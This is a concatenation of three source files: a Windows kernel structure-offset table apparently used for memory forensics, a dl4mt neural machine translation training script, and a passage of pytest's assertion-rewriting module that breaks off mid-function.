'IdleCount' : [ 0x0, ['unsigned long']],
'BusyCount' : [ 0x4, ['unsigned long']],
'BusyReference' : [ 0x8, ['unsigned long']],
'TotalBusyCount' : [ 0xc, ['unsigned long']],
'ConservationIdleTime' : [ 0x10, ['unsigned long']],
'PerformanceIdleTime' : [ 0x14, ['unsigned long']],
'DeviceObject' : [ 0x18, ['pointer', ['_DEVICE_OBJECT']]],
'IdleList' : [ 0x1c, ['_LIST_ENTRY']],
'IdleType' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'DeviceIdleNormal', 1: 'DeviceIdleDisk'})]],
'IdleState' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
'CurrentState' : [ 0x2c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
'Volume' : [ 0x30, ['_LIST_ENTRY']],
'Specific' : [ 0x38, ['__unnamed_1f8a']],
} ],
'_ARBITER_RETEST_ALLOCATION_PARAMETERS' : [ 0xc, {
'ArbitrationList' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
'AllocateFromCount' : [ 0x4, ['unsigned long']],
'AllocateFrom' : [ 0x8, ['pointer', ['_CM_PARTIAL_RESOURCE_DESCRIPTOR']]],
} ],
'_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_VALIDBITS' : [ 0x1, {
'FRUId' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'FRUText' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 8, native_type='unsigned char')]],
'AsUCHAR' : [ 0x0, ['unsigned char']],
} ],
'_FS_FILTER_CALLBACKS' : [ 0x38, {
'SizeOfFsFilterCallbacks' : [ 0x0, ['unsigned long']],
'Reserved' : [ 0x4, ['unsigned long']],
'PreAcquireForSectionSynchronization' : [ 0x8, ['pointer', ['void']]],
'PostAcquireForSectionSynchronization' : [ 0xc, ['pointer', ['void']]],
'PreReleaseForSectionSynchronization' : [ 0x10, ['pointer', ['void']]],
'PostReleaseForSectionSynchronization' : [ 0x14, ['pointer', ['void']]],
'PreAcquireForCcFlush' : [ 0x18, ['pointer', ['void']]],
'PostAcquireForCcFlush' : [ 0x1c, ['pointer', ['void']]],
'PreReleaseForCcFlush' : [ 0x20, ['pointer', ['void']]],
'PostReleaseForCcFlush' : [ 0x24, ['pointer', ['void']]],
'PreAcquireForModifiedPageWriter' : [ 0x28, ['pointer', ['void']]],
'PostAcquireForModifiedPageWriter' : [ 0x2c, ['pointer', ['void']]],
'PreReleaseForModifiedPageWriter' : [ 0x30, ['pointer', ['void']]],
'PostReleaseForModifiedPageWriter' : [ 0x34, ['pointer', ['void']]],
} ],
'_KENLISTMENT' : [ 0x168, {
'cookie' : [ 0x0, ['unsigned long']],
'NamespaceLink' : [ 0x4, ['_KTMOBJECT_NAMESPACE_LINK']],
'EnlistmentId' : [ 0x18, ['_GUID']],
'Mutex' : [ 0x28, ['_KMUTANT']],
'NextSameTx' : [ 0x48, ['_LIST_ENTRY']],
'NextSameRm' : [ 0x50, ['_LIST_ENTRY']],
'ResourceManager' : [ 0x58, ['pointer', ['_KRESOURCEMANAGER']]],
'Transaction' : [ 0x5c, ['pointer', ['_KTRANSACTION']]],
'State' : [ 0x60, ['Enumeration', dict(target = 'long', choices = {0: 'KEnlistmentUninitialized', 256: 'KEnlistmentActive', 258: 'KEnlistmentPrepared', 259: 'KEnlistmentInDoubt', 260: 'KEnlistmentCommitted', 261: 'KEnlistmentCommittedNotify', 262: 'KEnlistmentCommitRequested', 257: 'KEnlistmentPreparing', 264: 'KEnlistmentDelegated', 265: 'KEnlistmentDelegatedDisconnected', 266: 'KEnlistmentPrePreparing', 263: 'KEnlistmentAborted', 268: 'KEnlistmentRecovering', 269: 'KEnlistmentAborting', 270: 'KEnlistmentReadOnly', 271: 'KEnlistmentOutcomeUnavailable', 272: 'KEnlistmentOffline', 273: 'KEnlistmentPrePrepared', 274: 'KEnlistmentInitialized', 267: 'KEnlistmentForgotten'})]],
'Flags' : [ 0x64, ['unsigned long']],
'NotificationMask' : [ 0x68, ['unsigned long']],
'Key' : [ 0x6c, ['pointer', ['void']]],
'KeyRefCount' : [ 0x70, ['unsigned long']],
'RecoveryInformation' : [ 0x74, ['pointer', ['void']]],
'RecoveryInformationLength' : [ 0x78, ['unsigned long']],
'DynamicNameInformation' : [ 0x7c, ['pointer', ['void']]],
'DynamicNameInformationLength' : [ 0x80, ['unsigned long']],
'FinalNotification' : [ 0x84, ['pointer', ['_KTMNOTIFICATION_PACKET']]],
'SupSubEnlistment' : [ 0x88, ['pointer', ['_KENLISTMENT']]],
'SupSubEnlHandle' : [ 0x8c, ['pointer', ['void']]],
'SubordinateTxHandle' : [ 0x90, ['pointer', ['void']]],
'CrmEnlistmentEnId' : [ 0x94, ['_GUID']],
'CrmEnlistmentTmId' : [ 0xa4, ['_GUID']],
'CrmEnlistmentRmId' : [ 0xb4, ['_GUID']],
'NextHistory' : [ 0xc4, ['unsigned long']],
'History' : [ 0xc8, ['array', 20, ['_KENLISTMENT_HISTORY']]],
} ],
'_ARBITER_INTERFACE' : [ 0x18, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'Context' : [ 0x4, ['pointer', ['void']]],
'InterfaceReference' : [ 0x8, ['pointer', ['void']]],
'InterfaceDereference' : [ 0xc, ['pointer', ['void']]],
'ArbiterHandler' : [ 0x10, ['pointer', ['void']]],
'Flags' : [ 0x14, ['unsigned long']],
} ],
'_KAPC_STATE' : [ 0x18, {
'ApcListHead' : [ 0x0, ['array', 2, ['_LIST_ENTRY']]],
'Process' : [ 0x10, ['pointer', ['_KPROCESS']]],
'KernelApcInProgress' : [ 0x14, ['unsigned char']],
'KernelApcPending' : [ 0x15, ['unsigned char']],
'UserApcPending' : [ 0x16, ['unsigned char']],
} ],
'_IA64_LOADER_BLOCK' : [ 0x4, {
'PlaceHolder' : [ 0x0, ['unsigned long']],
} ],
'_IA64_DBGKD_CONTROL_SET' : [ 0x14, {
'Continue' : [ 0x0, ['unsigned long']],
'CurrentSymbolStart' : [ 0x4, ['unsigned long long']],
'CurrentSymbolEnd' : [ 0xc, ['unsigned long long']],
} ],
'_DEVICE_RELATIONS' : [ 0x8, {
'Count' : [ 0x0, ['unsigned long']],
'Objects' : [ 0x4, ['array', 1, ['pointer', ['_DEVICE_OBJECT']]]],
} ],
'_IMAGE_ROM_OPTIONAL_HEADER' : [ 0x38, {
'Magic' : [ 0x0, ['unsigned short']],
'MajorLinkerVersion' : [ 0x2, ['unsigned char']],
'MinorLinkerVersion' : [ 0x3, ['unsigned char']],
'SizeOfCode' : [ 0x4, ['unsigned long']],
'SizeOfInitializedData' : [ 0x8, ['unsigned long']],
'SizeOfUninitializedData' : [ 0xc, ['unsigned long']],
'AddressOfEntryPoint' : [ 0x10, ['unsigned long']],
'BaseOfCode' : [ 0x14, ['unsigned long']],
'BaseOfData' : [ 0x18, ['unsigned long']],
'BaseOfBss' : [ 0x1c, ['unsigned long']],
'GprMask' : [ 0x20, ['unsigned long']],
'CprMask' : [ 0x24, ['array', 4, ['unsigned long']]],
'GpValue' : [ 0x34, ['unsigned long']],
} ],
'_ALPC_COMPLETION_LIST_HEADER' : [ 0x300, {
'StartMagic' : [ 0x0, ['unsigned long long']],
'TotalSize' : [ 0x8, ['unsigned long']],
'ListOffset' : [ 0xc, ['unsigned long']],
'ListSize' : [ 0x10, ['unsigned long']],
'BitmapOffset' : [ 0x14, ['unsigned long']],
'BitmapSize' : [ 0x18, ['unsigned long']],
'DataOffset' : [ 0x1c, ['unsigned long']],
'DataSize' : [ 0x20, ['unsigned long']],
'AttributeFlags' : [ 0x24, ['unsigned long']],
'AttributeSize' : [ 0x28, ['unsigned long']],
'State' : [ 0x80, ['_ALPC_COMPLETION_LIST_STATE']],
'LastMessageId' : [ 0x88, ['unsigned long']],
'LastCallbackId' : [ 0x8c, ['unsigned long']],
'PostCount' : [ 0x100, ['unsigned long']],
'ReturnCount' : [ 0x180, ['unsigned long']],
'LogSequenceNumber' : [ 0x200, ['unsigned long']],
'UserLock' : [ 0x280, ['_RTL_SRWLOCK']],
'EndMagic' : [ 0x288, ['unsigned long long']],
} ],
'_IMAGE_DEBUG_DIRECTORY' : [ 0x1c, {
'Characteristics' : [ 0x0, ['unsigned long']],
'TimeDateStamp' : [ 0x4, ['unsigned long']],
'MajorVersion' : [ 0x8, ['unsigned short']],
'MinorVersion' : [ 0xa, ['unsigned short']],
'Type' : [ 0xc, ['unsigned long']],
'SizeOfData' : [ 0x10, ['unsigned long']],
'AddressOfRawData' : [ 0x14, ['unsigned long']],
'PointerToRawData' : [ 0x18, ['unsigned long']],
} ],
'_ETW_WMITRACE_WORK' : [ 0xf0, {
'LoggerId' : [ 0x0, ['unsigned long']],
'LoggerName' : [ 0x8, ['array', 65, ['unsigned char']]],
'FileName' : [ 0x49, ['array', 129, ['unsigned char']]],
'MaximumFileSize' : [ 0xcc, ['unsigned long']],
'MinBuffers' : [ 0xd0, ['unsigned long']],
'MaxBuffers' : [ 0xd4, ['unsigned long']],
'BufferSize' : [ 0xd8, ['unsigned long']],
'Mode' : [ 0xdc, ['unsigned long']],
'FlushTimer' : [ 0xe0, ['unsigned long']],
'MatchAny' : [ 0x8, ['unsigned long long']],
'MatchAll' : [ 0x10, ['unsigned long long']],
'EnableProperty' : [ 0x18, ['unsigned long']],
'Guid' : [ 0x1c, ['_GUID']],
'Level' : [ 0x2c, ['unsigned char']],
'Status' : [ 0xe8, ['long']],
} ],
'_DEVICE_MAP' : [ 0x34, {
'DosDevicesDirectory' : [ 0x0, ['pointer', ['_OBJECT_DIRECTORY']]],
'GlobalDosDevicesDirectory' : [ 0x4, ['pointer', ['_OBJECT_DIRECTORY']]],
'DosDevicesDirectoryHandle' : [ 0x8, ['pointer', ['void']]],
'ReferenceCount' : [ 0xc, ['unsigned long']],
'DriveMap' : [ 0x10, ['unsigned long']],
'DriveType' : [ 0x14, ['array', 32, ['unsigned char']]],
} ],
'_HEAP_DEBUGGING_INFORMATION' : [ 0x1c, {
'InterceptorFunction' : [ 0x0, ['pointer', ['void']]],
'InterceptorValue' : [ 0x4, ['unsigned short']],
'ExtendedOptions' : [ 0x8, ['unsigned long']],
'StackTraceDepth' : [ 0xc, ['unsigned long']],
'MinTotalBlockSize' : [ 0x10, ['unsigned long']],
'MaxTotalBlockSize' : [ 0x14, ['unsigned long']],
'HeapLeakEnumerationRoutine' : [ 0x18, ['pointer', ['void']]],
} ],
'_IO_RESOURCE_LIST' : [ 0x28, {
'Version' : [ 0x0, ['unsigned short']],
'Revision' : [ 0x2, ['unsigned short']],
'Count' : [ 0x4, ['unsigned long']],
'Descriptors' : [ 0x8, ['array', 1, ['_IO_RESOURCE_DESCRIPTOR']]],
} ],
'_MMBANKED_SECTION' : [ 0x20, {
'BasePhysicalPage' : [ 0x0, ['unsigned long']],
'BasedPte' : [ 0x4, ['pointer', ['_MMPTE']]],
'BankSize' : [ 0x8, ['unsigned long']],
'BankShift' : [ 0xc, ['unsigned long']],
'BankedRoutine' : [ 0x10, ['pointer', ['void']]],
'Context' : [ 0x14, ['pointer', ['void']]],
'CurrentMappedPte' : [ 0x18, ['pointer', ['_MMPTE']]],
'BankTemplate' : [ 0x1c, ['array', 1, ['_MMPTE']]],
} ],
'_WHEA_ERROR_RECORD_HEADER_FLAGS' : [ 0x4, {
'Recovered' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PreviousError' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Simulated' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'AsULONG' : [ 0x0, ['unsigned long']],
} ],
'_XSAVE_AREA_HEADER' : [ 0x40, {
'Mask' : [ 0x0, ['unsigned long long']],
'Reserved' : [ 0x8, ['array', 7, ['unsigned long long']]],
} ],
'_HEAP_VIRTUAL_ALLOC_ENTRY' : [ 0x20, {
'Entry' : [ 0x0, ['_LIST_ENTRY']],
'ExtraStuff' : [ 0x8, ['_HEAP_ENTRY_EXTRA']],
'CommitSize' : [ 0x10, ['unsigned long']],
'ReserveSize' : [ 0x14, ['unsigned long']],
'BusyBlock' : [ 0x18, ['_HEAP_ENTRY']],
} ],
'_PNP_DEVICE_COMPLETION_REQUEST' : [ 0x38, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'DeviceNode' : [ 0x8, ['pointer', ['_DEVICE_NODE']]],
'Context' : [ 0xc, ['pointer', ['void']]],
'CompletionState' : [ 0x10, ['Enumeration', dict(target = 'long', choices = {768: 'DeviceNodeUnspecified', 769: 'DeviceNodeUninitialized', 770: 'DeviceNodeInitialized', 771: 'DeviceNodeDriversAdded', 772: 'DeviceNodeResourcesAssigned', 773: 'DeviceNodeStartPending', 774: 'DeviceNodeStartCompletion', 775: 'DeviceNodeStartPostWork', 776: 'DeviceNodeStarted', 777: 'DeviceNodeQueryStopped', 778: 'DeviceNodeStopped', 779: 'DeviceNodeRestartCompletion', 780: 'DeviceNodeEnumeratePending', 781: 'DeviceNodeEnumerateCompletion', 782: 'DeviceNodeAwaitingQueuedDeletion', 783: 'DeviceNodeAwaitingQueuedRemoval', 784: 'DeviceNodeQueryRemoved', 785: 'DeviceNodeRemovePendingCloses', 786: 'DeviceNodeRemoved', 787: 'DeviceNodeDeletePendingCloses', 788: 'DeviceNodeDeleted', 789: 'MaxDeviceNodeState'})]],
'IrpPended' : [ 0x14, ['unsigned long']],
'Status' : [ 0x18, ['long']],
'Information' : [ 0x1c, ['pointer', ['void']]],
'WorkItem' : [ 0x20, ['_WORK_QUEUE_ITEM']],
'FailingDriver' : [ 0x30, ['pointer', ['_DRIVER_OBJECT']]],
'ReferenceCount' : [ 0x34, ['long']],
} ],
'_EVENT_FILTER_HEADER' : [ 0x18, {
'Id' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned char']],
'Reserved' : [ 0x3, ['array', 5, ['unsigned char']]],
'InstanceId' : [ 0x8, ['unsigned long long']],
'Size' : [ 0x10, ['unsigned long']],
'NextOffset' : [ 0x14, ['unsigned long']],
} ],
'_WAIT_CONTEXT_BLOCK' : [ 0x28, {
'WaitQueueEntry' : [ 0x0, ['_KDEVICE_QUEUE_ENTRY']],
'DeviceRoutine' : [ 0x10, ['pointer', ['void']]],
'DeviceContext' : [ 0x14, ['pointer', ['void']]],
'NumberOfMapRegisters' : [ 0x18, ['unsigned long']],
'DeviceObject' : [ 0x1c, ['pointer', ['void']]],
'CurrentIrp' : [ 0x20, ['pointer', ['void']]],
'BufferChainingDpc' : [ 0x24, ['pointer', ['_KDPC']]],
} ],
'_SECTION_OBJECT' : [ 0x18, {
'StartingVa' : [ 0x0, ['pointer', ['void']]],
'EndingVa' : [ 0x4, ['pointer', ['void']]],
'Parent' : [ 0x8, ['pointer', ['void']]],
'LeftChild' : [ 0xc, ['pointer', ['void']]],
'RightChild' : [ 0x10, ['pointer', ['void']]],
'Segment' : [ 0x14, ['pointer', ['_SEGMENT_OBJECT']]],
} ],
'_CM_NAME_CONTROL_BLOCK' : [ 0x10, {
'Compressed' : [ 0x0, ['unsigned char']],
'RefCount' : [ 0x2, ['unsigned short']],
'NameHash' : [ 0x4, ['_CM_NAME_HASH']],
'ConvKey' : [ 0x4, ['unsigned long']],
'NextHash' : [ 0x8, ['pointer', ['_CM_KEY_HASH']]],
'NameLength' : [ 0xc, ['unsigned short']],
'Name' : [ 0xe, ['array', 1, ['wchar']]],
} ],
}
| gpl-2.0 |
nyu-dl/dl4mt-tutorial | session2/train_nmt_all.py | 10 | 2194 | import numpy
import os
from nmt import train
def main(job_id, params):
print params
validerr = train(saveto=params['model'][0],
reload_=params['reload'][0],
dim_word=params['dim_word'][0],
dim=params['dim'][0],
n_words=params['n-words'][0],
n_words_src=params['n-words'][0],
decay_c=params['decay-c'][0],
clip_c=params['clip-c'][0],
lrate=params['learning-rate'][0],
optimizer=params['optimizer'][0],
maxlen=50,
batch_size=32,
valid_batch_size=32,
datasets=['/ichec/home/users/%s/data/all.en.concat.shuf.gz'%os.environ['USER'],
'/ichec/home/users/%s/data/all.fr.concat.shuf.gz'%os.environ['USER']],
valid_datasets=['/ichec/home/users/%s/data/newstest2011.en.tok'%os.environ['USER'],
'/ichec/home/users/%s/data/newstest2011.fr.tok'%os.environ['USER']],
dictionaries=['/ichec/home/users/%s/data/all.en.concat.gz.pkl'%os.environ['USER'],
'/ichec/home/users/%s/data/all.fr.concat.gz.pkl'%os.environ['USER']],
validFreq=5000,
dispFreq=10,
saveFreq=5000,
sampleFreq=1000,
use_dropout=params['use-dropout'][0],
overwrite=False)
return validerr
if __name__ == '__main__':
    # Default hyper-parameter configuration.  Each value is wrapped in a
    # one-element list because `main` indexes every entry with [0].
    config = {
        'model': ['/ichec/home/users/%s/models/model_session2_all.npz' % os.environ['USER']],
        'dim_word': [500],
        'dim': [1024],
        'n-words': [30000],
        'optimizer': ['adadelta'],
        'decay-c': [0.],
        'clip-c': [1.],
        'use-dropout': [False],
        'learning-rate': [0.0001],
        'reload': [False],
    }
    main(0, config)
| bsd-3-clause |
randyzingle/tools | kub/services/archive/cdk/python/sample-app/.env/lib/python3.6/site-packages/_pytest/assertion/rewrite.py | 1 | 40384 | """Rewrite assertion AST to produce nice error messages"""
import ast
import errno
import functools
import importlib.abc
import importlib.machinery
import importlib.util
import io
import itertools
import marshal
import os
import struct
import sys
import tokenize
import types
from typing import Dict
from typing import List
from typing import Optional
from typing import Set
from typing import Tuple
import atomicwrites
from _pytest._io.saferepr import saferepr
from _pytest._version import version
from _pytest.assertion import util
from _pytest.assertion.util import ( # noqa: F401
format_explanation as _format_explanation,
)
from _pytest.pathlib import fnmatch_ex
from _pytest.pathlib import PurePath
# pytest caches rewritten pycs in __pycache__.
# Cache tag unique to this interpreter *and* this pytest version, so pycs
# written by another interpreter or pytest release are never reused.
PYTEST_TAG = "{}-pytest-{}".format(sys.implementation.cache_tag, version)
# ".pyc" normally; ".pyo" only on old optimized builds where __debug__ is False.
PYC_EXT = ".py" + (__debug__ and "c" or "o")
# Full suffix appended to the module basename inside __pycache__.
PYC_TAIL = "." + PYTEST_TAG + PYC_EXT
class AssertionRewritingHook(importlib.abc.MetaPathFinder):
"""PEP302/PEP451 import hook which rewrites asserts."""
def __init__(self, config):
self.config = config
try:
self.fnpats = config.getini("python_files")
except ValueError:
self.fnpats = ["test_*.py", "*_test.py"]
self.session = None
self._rewritten_names = set() # type: Set[str]
self._must_rewrite = set() # type: Set[str]
# flag to guard against trying to rewrite a pyc file while we are already writing another pyc file,
# which might result in infinite recursion (#3506)
self._writing_pyc = False
self._basenames_to_check_rewrite = {"conftest"}
self._marked_for_rewrite_cache = {} # type: Dict[str, bool]
self._session_paths_checked = False
    def set_session(self, session):
        """Attach (or detach, with None) the active pytest session.

        Also resets the checked flag so the session's initial paths are
        (re)collected on the next early-bailout check.
        """
        self.session = session
        self._session_paths_checked = False

    # Indirection so we can mock calls to find_spec originated from the hook during testing
    _find_spec = importlib.machinery.PathFinder.find_spec
def find_spec(self, name, path=None, target=None):
if self._writing_pyc:
return None
state = self.config._assertstate
if self._early_rewrite_bailout(name, state):
return None
state.trace("find_module called for: %s" % name)
spec = self._find_spec(name, path)
if (
# the import machinery could not find a file to import
spec is None
# this is a namespace package (without `__init__.py`)
# there's nothing to rewrite there
# python3.5 - python3.6: `namespace`
# python3.7+: `None`
or spec.origin in {None, "namespace"}
# we can only rewrite source files
or not isinstance(spec.loader, importlib.machinery.SourceFileLoader)
# if the file doesn't exist, we can't rewrite it
or not os.path.exists(spec.origin)
):
return None
else:
fn = spec.origin
if not self._should_rewrite(name, fn, state):
return None
return importlib.util.spec_from_file_location(
name,
fn,
loader=self,
submodule_search_locations=spec.submodule_search_locations,
)
def create_module(self, spec):
return None # default behaviour is fine
    def exec_module(self, module):
        """Execute `module` after rewriting its asserts, caching the result.

        The rewritten code object is cached as a pyc in __pycache__ under a
        pytest-specific tag; a valid cached pyc is reused instead of
        re-rewriting the source.
        """
        fn = module.__spec__.origin
        state = self.config._assertstate
        self._rewritten_names.add(module.__name__)
        # The requested module looks like a test file, so rewrite it. This is
        # the most magical part of the process: load the source, rewrite the
        # asserts, and load the rewritten source. We also cache the rewritten
        # module code in a special pyc. We must be aware of the possibility of
        # concurrent pytest processes rewriting and loading pycs. To avoid
        # tricky race conditions, we maintain the following invariant: The
        # cached pyc is always a complete, valid pyc. Operations on it must be
        # atomic. POSIX's atomic rename comes in handy.
        write = not sys.dont_write_bytecode
        cache_dir = os.path.join(os.path.dirname(fn), "__pycache__")
        if write:
            ok = try_mkdir(cache_dir)
            if not ok:
                # Fall back to rewriting without caching when the cache
                # directory cannot be created (e.g. read-only filesystem).
                write = False
                state.trace("read only directory: {}".format(os.path.dirname(fn)))
        cache_name = os.path.basename(fn)[:-3] + PYC_TAIL
        pyc = os.path.join(cache_dir, cache_name)
        # Notice that even if we're in a read-only directory, I'm going
        # to check for a cached pyc. This may not be optimal...
        co = _read_pyc(fn, pyc, state.trace)
        if co is None:
            state.trace("rewriting {!r}".format(fn))
            source_stat, co = _rewrite_test(fn, self.config)
            if write:
                # Flag guards against re-entrant rewriting while the pyc
                # write is in flight (see find_spec / #3506).
                self._writing_pyc = True
                try:
                    _write_pyc(state, co, source_stat, pyc)
                finally:
                    self._writing_pyc = False
        else:
            state.trace("found cached rewritten pyc for {!r}".format(fn))
        exec(co, module.__dict__)
    def _early_rewrite_bailout(self, name, state):
        """This is a fast way to get out of rewriting modules. Profiling has
        shown that the call to PathFinder.find_spec (inside of the find_spec
        from this class) is a major slowdown, so, this method tries to
        filter what we're sure won't be rewritten before getting to it.

        Returns True when *name* can safely be skipped, False when the full
        (slower) _should_rewrite check is still required.
        """
        if self.session is not None and not self._session_paths_checked:
            # Lazily seed the basename cache from the session's initial
            # paths, exactly once.
            self._session_paths_checked = True
            for path in self.session._initialpaths:
                # Make something as c:/projects/my_project/path.py ->
                # ['c:', 'projects', 'my_project', 'path.py']
                parts = str(path).split(os.path.sep)
                # add 'path' to basenames to be checked.
                self._basenames_to_check_rewrite.add(os.path.splitext(parts[-1])[0])
        # Note: conftest already by default in _basenames_to_check_rewrite.
        parts = name.split(".")
        if parts[-1] in self._basenames_to_check_rewrite:
            return False
        # For matching the name it must be as if it was a filename.
        path = PurePath(os.path.sep.join(parts) + ".py")
        for pat in self.fnpats:
            # if the pattern contains subdirectories ("tests/**.py" for example) we can't bail out based
            # on the name alone because we need to match against the full path
            if os.path.dirname(pat):
                return False
            if fnmatch_ex(pat, path):
                return False
        if self._is_marked_for_rewrite(name, state):
            return False
        state.trace("early skip of rewriting module: {}".format(name))
        return True
    def _should_rewrite(self, name, fn, state):
        """Decide whether module *name* at path *fn* gets assertion rewriting."""
        # always rewrite conftest files
        if os.path.basename(fn) == "conftest.py":
            state.trace("rewriting conftest file: {!r}".format(fn))
            return True
        if self.session is not None:
            if self.session.isinitpath(fn):
                state.trace(
                    "matched test file (was specified on cmdline): {!r}".format(fn)
                )
                return True
        # modules not passed explicitly on the command line are only
        # rewritten if they match the naming convention for test files
        fn_path = PurePath(fn)
        for pat in self.fnpats:
            if fnmatch_ex(pat, fn_path):
                state.trace("matched test file {!r}".format(fn))
                return True
        # Finally, honour modules explicitly registered via mark_rewrite().
        return self._is_marked_for_rewrite(name, state)
def _is_marked_for_rewrite(self, name: str, state):
try:
return self._marked_for_rewrite_cache[name]
except KeyError:
for marked in self._must_rewrite:
if name == marked or name.startswith(marked + "."):
state.trace(
"matched marked file {!r} (from {!r})".format(name, marked)
)
self._marked_for_rewrite_cache[name] = True
return True
self._marked_for_rewrite_cache[name] = False
return False
    def mark_rewrite(self, *names: str) -> None:
        """Mark import names as needing to be rewritten.
        The named module or package as well as any nested modules will
        be rewritten on import.
        """
        # Warn about modules that were already imported unrewritten, unless
        # they opted out of rewriting or were in fact loaded by this hook.
        already_imported = (
            set(names).intersection(sys.modules).difference(self._rewritten_names)
        )
        for name in already_imported:
            mod = sys.modules[name]
            if not AssertionRewriter.is_rewrite_disabled(
                mod.__doc__ or ""
            ) and not isinstance(mod.__loader__, type(self)):
                self._warn_already_imported(name)
        self._must_rewrite.update(names)
        # Invalidate memoized decisions; they may change with the new names.
        self._marked_for_rewrite_cache.clear()
    def _warn_already_imported(self, name):
        """Emit a PytestAssertRewriteWarning for a module imported too early."""
        # NOTE(review): local imports presumably avoid an import cycle at
        # module load time -- confirm before hoisting them.
        from _pytest.warning_types import PytestAssertRewriteWarning
        from _pytest.warnings import _issue_warning_captured
        _issue_warning_captured(
            PytestAssertRewriteWarning(
                "Module already imported so cannot be rewritten: %s" % name
            ),
            self.config.hook,
            stacklevel=5,
        )
def get_data(self, pathname):
"""Optional PEP302 get_data API."""
with open(pathname, "rb") as f:
return f.read()
def _write_pyc(state, co, source_stat, pyc):
    """Atomically write code object *co* to *pyc*; return True on success.

    Failures are swallowed (with a trace message) because a missing cache
    file only costs a re-rewrite on the next import.
    """
    # Technically, we don't have to have the same pyc format as
    # (C)Python, since these "pycs" should never be seen by builtin
    # import. However, there's little reason to deviate.
    try:
        with atomicwrites.atomic_write(pyc, mode="wb", overwrite=True) as fp:
            fp.write(importlib.util.MAGIC_NUMBER)
            # as of now, bytecode header expects 32-bit numbers for size and mtime (#4903)
            mtime = int(source_stat.st_mtime) & 0xFFFFFFFF
            size = source_stat.st_size & 0xFFFFFFFF
            # "<LL" stands for 2 unsigned longs, little-endian
            fp.write(struct.pack("<LL", mtime, size))
            fp.write(marshal.dumps(co))
    except EnvironmentError as e:
        state.trace("error writing pyc file at {}: errno={}".format(pyc, e.errno))
        # we ignore any failure to write the cache file
        # there are many reasons, permission-denied, __pycache__ being a
        # file etc.
        return False
    return True
def _rewrite_test(fn, config):
    """Read and rewrite *fn*; return ``(stat_result, code object)``.

    The stat result is taken before reading so the caller can record the
    source's mtime/size alongside the compiled code.
    """
    stat = os.stat(fn)
    with open(fn, "rb") as f:
        source = f.read()
    tree = ast.parse(source, filename=fn)
    # Mutates *tree* in place, injecting the assertion-rewrite machinery.
    rewrite_asserts(tree, source, fn, config)
    co = compile(tree, fn, "exec", dont_inherit=True)
    return stat, co
def _read_pyc(source, pyc, trace=lambda x: None):
    """Possibly read a pytest pyc containing rewritten code.
    Return rewritten code if successful or None if not.

    The 12-byte header (magic number + 32-bit mtime + 32-bit size) must
    match the current *source* file, otherwise the cache is stale.
    """
    try:
        fp = open(pyc, "rb")
    except IOError:
        return None
    with fp:
        try:
            stat_result = os.stat(source)
            mtime = int(stat_result.st_mtime)
            size = stat_result.st_size
            data = fp.read(12)
        except EnvironmentError as e:
            trace("_read_pyc({}): EnvironmentError {}".format(source, e))
            return None
        # Check for invalid or out of date pyc file.
        if (
            len(data) != 12
            or data[:4] != importlib.util.MAGIC_NUMBER
            or struct.unpack("<LL", data[4:]) != (mtime & 0xFFFFFFFF, size & 0xFFFFFFFF)
        ):
            trace("_read_pyc(%s): invalid or out of date pyc" % source)
            return None
        try:
            co = marshal.load(fp)
        except Exception as e:
            trace("_read_pyc({}): marshal.load error {}".format(source, e))
            return None
        if not isinstance(co, types.CodeType):
            trace("_read_pyc(%s): not a code object" % source)
            return None
        return co
def rewrite_asserts(mod, source, module_path=None, config=None):
    """Rewrite the assert statements in mod (an ast.Module), in place."""
    AssertionRewriter(module_path, config, source).run(mod)
def _saferepr(obj):
    """Get a safe repr of an object for assertion error messages.
    The assertion formatting (util.format_explanation()) requires
    newlines to be escaped since they are a special character for it.
    Normally assertion.util.format_explanation() does this but for a
    custom repr it is possible to contain one of the special escape
    sequences, especially '\n{' and '\n}' are likely to be present in
    JSON reprs.
    """
    # Escape real newlines so format_explanation() sees one logical line.
    return saferepr(obj).replace("\n", "\\n")
def _format_assertmsg(obj):
"""Format the custom assertion message given.
For strings this simply replaces newlines with '\n~' so that
util.format_explanation() will preserve them instead of escaping
newlines. For other objects saferepr() is used first.
"""
# reprlib appears to have a bug which means that if a string
# contains a newline it gets escaped, however if an object has a
# .__repr__() which contains newlines it does not get escaped.
# However in either case we want to preserve the newline.
replaces = [("\n", "\n~"), ("%", "%%")]
if not isinstance(obj, str):
obj = saferepr(obj)
replaces.append(("\\n", "\n~"))
for r1, r2 in replaces:
obj = obj.replace(r1, r2)
return obj
def _should_repr_global_name(obj):
if callable(obj):
return False
try:
return not hasattr(obj, "__name__")
except Exception:
return True
def _format_boolop(explanations, is_or):
explanation = "(" + (is_or and " or " or " and ").join(explanations) + ")"
if isinstance(explanation, str):
return explanation.replace("%", "%%")
else:
return explanation.replace(b"%", b"%%")
def _call_reprcompare(ops, results, expls, each_obj):
    # type: (Tuple[str, ...], Tuple[bool, ...], Tuple[str, ...], Tuple[object, ...]) -> str
    """Return the explanation for the first failing (or last) comparison link.

    Walks a chained comparison left to right, stopping at the first falsy
    result; an installed util._reprcompare hook may override the default
    explanation for that link.
    """
    for i, res, expl in zip(range(len(ops)), results, expls):
        try:
            done = not res
        except Exception:
            # Truthiness itself may raise (e.g. ambiguous array-like values);
            # treat that as the stopping point.
